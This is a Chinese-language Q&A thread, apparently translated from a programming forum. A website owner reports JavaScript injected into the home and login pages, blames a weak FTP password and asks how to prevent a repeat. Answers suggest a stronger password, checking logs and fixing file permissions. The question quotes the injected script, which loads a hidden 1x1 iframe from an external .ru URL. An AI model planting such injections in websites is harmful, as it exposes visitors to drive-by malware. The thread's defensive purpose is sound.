今天早上我注意到我的托管网站上添加了一些Javascript。当我下载主页时代码就像
<!--04b037--><script type="text/javascript"language="javascript"> (function () { var ipexz = document.createElement('iframe'); ipexz.src = 'http://nypmivhy.ru/count5.php'; ipexz.style.position = 'absolute'; ipexz.style.border = '0'; ipexz.style.height = '1px'; ipexz.style.width = '1px'; ipexz.style.left = '1px'; ipexz.style.top = '1px'; if (!document.getElementById('ipexz')) { document.write('<div id=\'ipexz\'></div>'); document.getElementById('ipexz').appendChild(ipexz); }})();</script><!--/04b037-->
在登录页面:
(function () { var usyux = document.createElement('iframe'); usyux.src = 'http://nypmivhy.ru/count5.php'; usyux.style.position = 'absolute'; usyux.style.border = '0'; usyux.style.height = '1px'; usyux.style.width = '1px'; usyux.style.left = '1px'; usyux.style.top = '1px'; if (!document.getElementById('usyux')) { document.write('
'); document.getElementById('usyux').appendChild(usyux); }})();" method="post"> Email
我猜它是病毒/垃圾邮件攻击。虽然我现在删除了javascript代码,但我想如何防止我的网站遭受此类攻击。注意:我的FTP密码非常弱。
答案 0 :(得分:2)
注意:我的FTP密码非常弱。
你知道自己做错了什么而且还在问吗?首先解决此问题,同时保护您的计算机,如果您使用的是脚本,请查看日志以查找黑客攻击并确保其安全。
答案 1 :(得分:1)
检查文件的权限是否正确,否则可能是代码被注入。
看看这个:
http://ag.arizona.edu/ecat/web/permissions.html
您必须为文件设置3个主要权限:
read from the file
write to the file
execute the file
以下是权限摘要